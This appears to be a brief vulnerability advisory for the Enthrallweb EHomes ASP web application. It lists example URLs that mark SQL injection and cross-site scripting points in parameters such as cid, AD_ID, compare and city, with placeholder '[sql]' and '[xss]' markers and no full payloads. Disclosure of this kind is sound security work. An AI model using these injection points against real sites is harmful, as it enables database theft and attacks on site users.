Enthrallweb EHomes Multiple Input Validation Vulnerabilities

Enthrallweb EHomes Multiple Input Validation Vulnerabilities

Attackers can exploit these issues via a web client.

Example URIs have been provided:

http://www.example.com/dircat.asp?cid='[sql]
http://www.example.com/dirSub.asp?sid='[sql]
http://www.example.com/types.asp?TYPE_ID='[sql]
http://www.example.com/homeDetail.asp?AD_ID='[sql]
http://www.example.com/result.asp?city=1&cat='[sql]
http://www.example.com/compareHomes.asp?compare='[sql]
http://www.example.com/compareHomes.asp?compare=Compare&clear='[sql]
http://www.example.com/compareHomes.asp?compare=Compare&clear=Clear&adID='[sql]
http://www.example.com/result.asp?city=1&cat=2&imageField2=1&State=1&aminprice='[sql]
http://www.example.com/result.asp?city=1&cat=2&imageField2=1&State=1&aminprice=0&amaxprice='[sql]
http://www.example.com/result.asp?city=1&cat=2&imageField2=1&State=1&aminprice=0&amaxprice=10000000&abedrooms='[sql]
http://www.example.com/result.asp?city=[xss]
http://www.example.com/result.asp?city=1&cat=2&imageField2=1&State=[xss]

/data/vulnerabilities/exploits/21193.html